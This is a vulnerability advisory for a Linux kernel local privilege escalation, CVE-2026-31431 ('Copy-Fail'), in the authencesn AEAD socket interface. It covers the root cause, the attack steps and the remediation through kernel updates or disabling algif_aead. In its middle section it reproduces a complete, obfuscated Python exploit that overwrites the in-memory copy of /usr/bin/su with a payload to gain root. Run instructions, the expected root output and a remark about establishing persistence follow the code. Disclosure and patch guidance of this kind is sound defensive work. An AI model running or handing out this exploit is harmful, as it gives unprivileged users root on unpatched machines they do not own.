📋 Vulnerability Summary
| Field | Details |
|---|---|
| CVE ID | CVE-2026-31431 |
| Severity | High |
| CVSS Score | 7.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| Vendor | Linux |
| Affected Software | Linux Kernel - authencesn cryptographic template |
| Patch Status | Patched |
| Patch Date | 2026-04-01 |
🔍 Technical Analysis
Copy-Fail is a local privilege escalation vulnerability in the Linux kernel.
It abuses a logic bug in the authencesn cryptographic template, a component of the kernel’s AEAD (Authenticated Encryption with Associated Data) subsystem.
An unprivileged local user can exploit this to perform a deterministic, controlled 4-byte write into the page cache of any file they can read on the system, including setuid binaries like su.
Because the write targets the in-memory page cache rather than the file on disk directly, the modification is invisible to most integrity checks and only persists until the page is evicted from cache.
However, that window is more than sufficient to overwrite a setuid binary with shellcode and elevate to root.
Root Cause
The bug lives in the kernel’s algif_aead socket interface, which exposes AEAD cryptographic operations to userspace via AF_ALG sockets.
The authencesn template (authenticated encryption with sequence numbers) fails to correctly validate the length of associated data passed in a sendmsg call.
When a crafted message is sent with specific socket options and control message parameters, the kernel performs a splice operation that incorrectly maps the output into the page cache of an arbitrary file descriptor, rather than the expected output buffer.
Because algif_aead sockets are available to unprivileged users, no special capabilities are required.
Attack Vector
The attack requires only a standard unprivileged local user account. The exploit:
- Opens a file descriptor to a target setuid binary (e.g.
/usr/bin/su). Read permission is sufficient - Creates an
AF_ALGsocket using theauthencesn(hmac(sha256),cbc(aes))template - Crafts a
sendmsgcall with specific control messages to trigger the page cache write primitive - Uses
splice()to direct 4 bytes of attacker-controlled data into the page cache at a chosen offset within the target file - Repeats the write loop to patch the binary in-memory, then executes it to gain root
Impact
Successful exploitation grants full root privileges on the vulnerable system. The attack is:
- Deterministic — no heap spraying or timing races required
- Non-destructive — writes go to the page cache, not the underlying filesystem
- Broadly applicable — any readable file can be targeted, including all setuid binaries
🧪 Proof of Concept
This proof of concept is provided for educational purposes only. Only test against systems you own or have explicit permission to test.
The PoC is from the public exploit by theori-io.
It opens /usr/bin/su, iterates through a compressed payload 4 bytes at a time, and writes each chunk into the binary’s page cache using the algif_aead write primitive.
Once the binary is fully patched in memory, it calls su, which now executes the attacker’s code instead.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0)
a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"))
h=279
v=a.setsockopt
v(h,1,d('0800010000000010'+'0'*64))
v(h,5,None,4);u,_=a.accept()
o=t+4
i=d('00')
u.sendmsg(
[b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768
)
r,w=g.pipe()
n=g.splice
n(f,w,o,offset_src=0)
n(r,u.fileno(),o)
try:
u.recv(8+t)
except:
0
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")
Environment Setup
You need a local user account on a vulnerable Linux system. No special privileges are required. The algif_aead kernel module must be loaded, it is by default on most distributions.
1
2
3
4
5
# Confirm the module is loaded
lsmod | grep algif_aead
# Verify your kernel version is affected (pre-patch)
uname -r
Exploitation Steps
This is a very simple exploit. You will first need to be logged in as a standard user.
Step 1 — Create exploit file
1
2
touch exploit.py
# Paste the PoC code above into this file
Step 2 — Make it executable and then run it
1
2
chmod +x exploit.py
python3 exploit.py
Expected Output
If successful, the exploit patches /usr/bin/su in memory and calls it. Running whoami confirms root access:
1
2
# whoami
root
The change is not permanent. Rebooting or evicting the page cache restores the original binary. However, root access can be used to establish persistence through other means before the page is evicted.
🛡️ Remediation
Patch
Most major Linux distributions have shipped kernel updates containing the fix. Update your kernel to the latest available version:
1
2
3
4
5
6
7
8
9
10
11
# Debian / Ubuntu
sudo apt update && sudo apt upgrade linux-image-generic
# RHEL / Fedora
sudo dnf update kernel
# Arch
sudo pacman -Syu linux
# Reboot to load the new kernel
sudo reboot
Verify the patched kernel is running after reboot with uname -r and cross-reference against your distribution’s security advisory.
Mitigations
If immediate patching is not possible, disable the algif_aead kernel module to remove the attack surface:
1
2
3
4
5
# Prevent the module from loading on boot
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# Unload the module if currently loaded
sudo rmmod algif_aead
Disabling algif_aead may affect applications that use AEAD cryptographic operations via the kernel’s AF_ALG interface. Test in a non-production environment first.